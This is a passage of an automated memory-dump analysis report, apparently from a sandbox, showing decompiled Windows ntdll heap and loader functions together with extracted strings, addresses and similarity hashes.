										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E00F17D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E00FB1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E00F17D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E00FB1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E00F1B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E00F1BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E00FBA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x00f1b486
0x00f1b48a
0x00f1b48e
0x00f1b491
0x00f1b493
0x00f1b49a
0x00f1b49c
0x00f1b4a2
0x00f1b4a7
0x00f1b6fc
0x00f1b6fc
0x00f1b6b3
0x00f1b6c3
0x00f1b6c3
0x00f1b4b4
0x00f6294f
0x00f62951
0x00f62957
0x00f6295d
0x00f62961
0x00f62980
0x00f62985
0x00f62963
0x00f62978
0x00f6297d
0x00f6298b
0x00f62990
0x00f62995
0x00f6299d
0x00f629a1
0x00f629a2
0x00f629a2
0x00f629a7
0x00f629a7
0x00f62951
0x00f1b4ba
0x00f1b4ba
0x00f1b4bd
0x00f1b4c2
0x00f1b6d4
0x00f1b4c8
0x00f1b4c8
0x00f1b4c8
0x00f1b4cd
0x00f1b4d0
0x00f1b4d9
0x00f1b4df
0x00f1b4e2
0x00f629b7
0x00f629bd
0x00000000
0x00f1b4e8
0x00f1b4e8
0x00f1b4ef
0x00f1b4fa
0x00f1b703
0x00f1b709
0x00f1b70b
0x00f1b711
0x00f1b711
0x00f1b70b
0x00f1b503
0x00f1b50c
0x00f1b511
0x00f1b514
0x00f1b519
0x00f629c5
0x00f629c7
0x00f629cc
0x00f629cd
0x00f629cf
0x00f629d0
0x00f629d2
0x00f629d7
0x00f629d9
0x00f629ee
0x00f629ee
0x00f629f4
0x00f629fa
0x00f62a01
0x00000000
0x00f62a01
0x00f629db
0x00f629df
0x00000000
0x00000000
0x00f629e1
0x00f629e4
0x00000000
0x00000000
0x00f629e6
0x00f629e6
0x00f1b51f
0x00f1b51f
0x00f1b520
0x00f1b525
0x00f1b52b
0x00f1b52d
0x00f1b52e
0x00f1b530
0x00f1b535
0x00f1b53b
0x00f1b53d
0x00f62a07
0x00000000
0x00f62a07
0x00f1b549
0x00f1b54e
0x00f62a12
0x00f62a15
0x00000000
0x00000000
0x00f62a24
0x00f1b559
0x00f1b55c
0x00f62a34
0x00f62a3b
0x00f62a4d
0x00f62a4d
0x00f62a3b
0x00f1b566
0x00f1b56b
0x00f1b56f
0x00f1b57b
0x00f1b582
0x00f62a57
0x00f62a5c
0x00f62a5c
0x00f1b582
0x00f1b58b
0x00f1b58e
0x00f1b592
0x00f1b596
0x00f1b599
0x00f1b59b
0x00f1b59e
0x00f1b5a3
0x00f1b5a6
0x00f1b5a9
0x00f62a66
0x00f62a67
0x00f62a73
0x00f62a78
0x00f1b5b8
0x00f1b5b8
0x00f1b5bb
0x00f1b5bd
0x00f1b5bd
0x00f1b5c4
0x00f1b5f7
0x00f1b5f7
0x00f1b600
0x00f1b606
0x00f1b60c
0x00f1b612
0x00f1b618
0x00f1b621
0x00f1b623
0x00f1b629
0x00f1b629
0x00f1b62c
0x00f1b62f
0x00f1b633
0x00f1b636
0x00f1b639
0x00f1b71d
0x00f1b720
0x00f1b736
0x00f1b660
0x00f1b660
0x00f1b662
0x00f1b665
0x00f1b66a
0x00f1b6e6
0x00f1b6e7
0x00f1b6ea
0x00f1b6ef
0x00f62ad1
0x00f62ad2
0x00f62ad8
0x00f62add
0x00f62add
0x00f1b6f5
0x00f1b6f5
0x00f1b672
0x00f1b675
0x00f1b67a
0x00f62ae5
0x00f62ae8
0x00000000
0x00000000
0x00f62af4
0x00f62afc
0x00000000
0x00f1b680
0x00f1b680
0x00f1b680
0x00f1b685
0x00f1b687
0x00f1b68a
0x00f62b06
0x00f62b0c
0x00f62b13
0x00f62b1e
0x00f62b20
0x00f62b2b
0x00f62b2b
0x00f62b2b
0x00f62b34
0x00f62b45
0x00f62b45
0x00f62b13
0x00f1b696
0x00f1b69b
0x00f1b6a0
0x00f62b4f
0x00f62b52
0x00000000
0x00000000
0x00f62b61
0x00000000
0x00f1b6a6
0x00f1b6a6
0x00f1b6a6
0x00f1b6a8
0x00f1b6ab
0x00f62b70
0x00f62b72
0x00f62b7d
0x00f62b7d
0x00f62b7d
0x00f62b86
0x00f62b97
0x00f62b97
0x00f1b6b1
0x00000000
0x00f1b6b1
0x00f1b6a0
0x00f1b67a
0x00f1b722
0x00f1b722
0x00f1b655
0x00f1b65d
0x00000000
0x00f1b5c6
0x00f1b5c6
0x00f1b5ce
0x00f62a83
0x00f62a97
0x00f62a97
0x00f62a9a
0x00000000
0x00000000
0x00f62a88
0x00f62a8a
0x00f62a8c
0x00f62a8f
0x00f62a92
0x00f62aa1
0x00f62aa1
0x00f62aa2
0x00f62aab
0x00f62ab0
0x00000000
0x00f62ab0
0x00f62a94
0x00f62a94
0x00000000
0x00f62a9c
0x00f1b5d4
0x00f1b5d4
0x00f1b5d6
0x00f1b5d9
0x00f1b5de
0x00f1b5e1
0x00f1b5e4
0x00f62ab8
0x00f62ab9
0x00f62ac4
0x00f62ac9
0x00f1b5f2
0x00f1b5f2
0x00f1b5f4
0x00f1b5f4
0x00000000
0x00f1b5e4
0x00f1b5c4
0x00f1b554
0x00f1b554
0x00000000
0x00f1b554

Strings

HEAP[%wZ]: , xrefs: 00F62973
(UCRBlock->Size >= *Size), xrefs: 00F6298B
HEAP: , xrefs: 00F62980

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: cbce8a647fb711d4cad04e6d05ff85c4bb32289faaee0ba191f3b385acb3cb60
Instruction ID: 2391144e92f6d5db698a5a59fbb661ed7b15e1b56e5260c3918364aa93343c95
Opcode Fuzzy Hash: cbce8a647fb711d4cad04e6d05ff85c4bb32289faaee0ba191f3b385acb3cb60
Instruction Fuzzy Hash: B6E19C71A00609DFDB19CF68C894BBAB7B5FF48310F2481A9E4169B391D774ED81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F08794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F08794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00F0934A() != 0) {
								_t159 = E00F7A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xfe5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00F75510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xfe5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00F0849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00F08999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00F08999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xfe5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xfe5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00F12280(_t92, 0xfe86cc);
															_t94 = E00FC9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00F261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xfe5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00F08A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xfe5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xfe5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00F3F380(_t136, 0xed1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00F12280(_t108, 0xfe86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00F261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00FC9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00F0FFB0(_t118, _t156, 0xfe86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00F39A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00f08799
0x00f0879d
0x00f087a1
0x00f087a3
0x00f087a8
0x00f087c3
0x00f087c3
0x00f087c8
0x00f087d1
0x00f087d4
0x00f087d8
0x00f087e5
0x00f087ec
0x00f59bfe
0x00f59c00
0x00f59c02
0x00f59c08
0x00f59c0d
0x00f59c0f
0x00f59c14
0x00f59c2d
0x00f59c32
0x00f59c37
0x00f59c3a
0x00f59c3c
0x00f59c42
0x00f59c42
0x00f59c3c
0x00f59c02
0x00f087da
0x00f087df
0x00f087e3
0x00000000
0x00000000
0x00f087e3
0x00f087f2
0x00000000
0x00f087fb
0x00f087fd
0x00f087fe
0x00f0880e
0x00f0880f
0x00f08810
0x00f08814
0x00f0881a
0x00f0881c
0x00f0881f
0x00f08821
0x00f08822
0x00f08824
0x00f08826
0x00f0882c
0x00f0882e
0x00f59c48
0x00f59c48
0x00f08834
0x00f08834
0x00f08837
0x00000000
0x00000000
0x00f08837
0x00f0882e
0x00f0883d
0x00f08840
0x00f08843
0x00f08846
0x00f08849
0x00f0884c
0x00f0884e
0x00f08850
0x00f08852
0x00f08854
0x00f08857
0x00f088b4
0x00f088b6
0x00f088b6
0x00f08859
0x00f08859
0x00f08859
0x00f08861
0x00f08866
0x00f0886a
0x00f0893d
0x00f08941
0x00000000
0x00f08947
0x00f08947
0x00f0894a
0x00f0894c
0x00000000
0x00f08952
0x00f08955
0x00f0895a
0x00f0895d
0x00f0895d
0x00f0895f
0x00f08961
0x00f08961
0x00f08968
0x00000000
0x00000000
0x00f0896a
0x00f0896b
0x00f0896e
0x00000000
0x00f08970
0x00f08970
0x00f08970
0x00f08970
0x00f08972
0x00f08972
0x00f08974
0x00000000
0x00f0897a
0x00f0897a
0x00f0897d
0x00000000
0x00f08983
0x00f59c65
0x00f59c6d
0x00f59c72
0x00f59c75
0x00f59c75
0x00f59c82
0x00f59c86
0x00f59c87
0x00f59c88
0x00f59c89
0x00f59c8c
0x00f59c90
0x00f59c95
0x00f59c97
0x00f59ca0
0x00f59ca3
0x00f59ca9
0x00f59ca9
0x00000000
0x00f59ca9
0x00f59ca3
0x00000000
0x00f59c97
0x00f0897d
0x00000000
0x00f08974
0x00f08988
0x00f08992
0x00f08996
0x00000000
0x00f08996
0x00f0894c
0x00000000
0x00f08870
0x00f0887b
0x00f0887d
0x00f0887f
0x00f08881
0x00f08884
0x00f08884
0x00f08886
0x00f08889
0x00f0888c
0x00f0888e
0x00f08891
0x00f08891
0x00f08898
0x00000000
0x00000000
0x00f0889a
0x00f0889b
0x00f0889e
0x00000000
0x00000000
0x00f088a0
0x00f088a8
0x00f088b0
0x00f088b2
0x00f088d3
0x00f088d5
0x00000000
0x00f088d7
0x00f088db
0x00f088dc
0x00f088e0
0x00f088e8
0x00f088ee
0x00f088f0
0x00f088f3
0x00f088fc
0x00f08901
0x00f08906
0x00f0890c
0x00f0890c
0x00f0890f
0x00f08916
0x00f08917
0x00f08918
0x00f08919
0x00f0891a
0x00f0891f
0x00f08921
0x00f59c52
0x00f59c55
0x00f59c5b
0x00f59cac
0x00f59cc0
0x00f59cc0
0x00f59c55
0x00f08927
0x00f08927
0x00f0892f
0x00f08933
0x00000000
0x00f088f5
0x00f088f5
0x00000000
0x00f088f7
0x00f088f7
0x00f088fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00f088fa
0x00f088f5
0x00f088f3
0x00000000
0x00f088d5
0x00000000
0x00f088b2
0x00f088c9
0x00000000
0x00f088c9
0x00f0887f
0x00f0886a
0x00f08857
0x00f08852
0x00f088bf
0x00f088bf
0x00f087aa
0x00f087ad
0x00f087ae
0x00f087b4
0x00f087b5
0x00f087b6
0x00f087b8
0x00f087bd
0x00f087c1
0x00f087f4
0x00f087fa
0x00000000
0x00000000
0x00000000
0x00f087c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 00F59C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00F59C18
minkernel\ntdll\ldrsnap.c, xrefs: 00F59C28

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: fc5e986da166a9127ead3b15b64e792537d77c765ea427de0bc9f20606c80bc9
Instruction ID: a4eb63b679a29263edd5eefb01db965f3cb6345bb9f5f6da115b52fd619628f1
Opcode Fuzzy Hash: fc5e986da166a9127ead3b15b64e792537d77c765ea427de0bc9f20606c80bc9
Instruction Fuzzy Hash: 9091F631E00216DBDF18DF59C881ABA73F5FF44764B548069E985AB291DB70ED02FB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2AC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F2AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00F4D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xfe8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00F396E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00FA3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00F396E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00EFB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00FB14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00F17D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00FB1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00F17D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00FB1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x00f2ac85
0x00f2ac88
0x00f2ac8a
0x00f2ac8d
0x00f2ac91
0x00f2ac99
0x00f2ac9c
0x00f69f57
0x00f69f5b
0x00f69f60
0x00f69f60
0x00f2aca8
0x00f2acae
0x00f2acda
0x00f2acde
0x00f2ace8
0x00f2aceb
0x00f2acee
0x00000000
0x00f2acee
0x00f2acf6
0x00f2acb0
0x00f2acb0
0x00f2acbb
0x00f2acbd
0x00f2acc0
0x00f2acc5
0x00f2adae
0x00f2adb4
0x00f2adb4
0x00f2acd4
0x00f2acd8
0x00f2acf9
0x00f2acff
0x00f2ad04
0x00f2ad08
0x00f2ad09
0x00f2ad10
0x00f2ad12
0x00f2ad18
0x00f69f6f
0x00f69f74
0x00f69f76
0x00f69f7c
0x00f69f84
0x00f69f88
0x00f69f89
0x00f69f90
0x00f69f90
0x00f69f76
0x00f2ad1e
0x00f2ad24
0x00f2ad26
0x00f6a097
0x00f6a09b
0x00f6a0ba
0x00f6a0bf
0x00f6a09d
0x00f6a0b2
0x00f6a0b7
0x00f6a0c5
0x00f6a0c8
0x00f6a0cb
0x00f6a0d2
0x00000000
0x00f2ad2c
0x00f2ad2c
0x00f2ad2f
0x00f2ad34
0x00f2ad36
0x00f69f97
0x00f69f9a
0x00000000
0x00000000
0x00f69fa9
0x00f2ad3e
0x00f2ad3e
0x00f2ad41
0x00f69fb3
0x00f69fb9
0x00f69fc0
0x00f69fd0
0x00f69fd0
0x00f69fc0
0x00f2ad4a
0x00f2ad50
0x00f2ad5c
0x00f2ad62
0x00f2ad68
0x00f2ad6b
0x00f2ad6d
0x00f69fda
0x00f69fdd
0x00000000
0x00000000
0x00f69fec
0x00000000
0x00f2ad73
0x00f2ad73
0x00f2ad73
0x00f2ad75
0x00f2ad75
0x00f2ad78
0x00f69ff6
0x00f69ffc
0x00f6a003
0x00f6a00e
0x00f6a010
0x00f6a01b
0x00f6a01b
0x00f6a01b
0x00f6a038
0x00f6a038
0x00f6a003
0x00f2ad84
0x00f2ad89
0x00f2ad8c
0x00f2ad8e
0x00f6a042
0x00f6a045
0x00000000
0x00000000
0x00f6a054
0x00000000
0x00f2ad94
0x00f2ad94
0x00f2ad94
0x00f2ad96
0x00f2ad96
0x00f2ad99
0x00f6a063
0x00f6a065
0x00f6a070
0x00f6a070
0x00f6a070
0x00f6a08d
0x00f6a08d
0x00f2ada4
0x00f2ada6
0x00000000
0x00f2ada6
0x00f2ad8e
0x00f2ad6d
0x00f2ad3c
0x00f2ad3c
0x00000000
0x00f2ad3c
0x00000000
0x00000000
0x00000000
0x00f2acd8

Strings

HEAP[%wZ]: , xrefs: 00F6A0AD
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00F6A0CD
HEAP: , xrefs: 00F6A0BA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
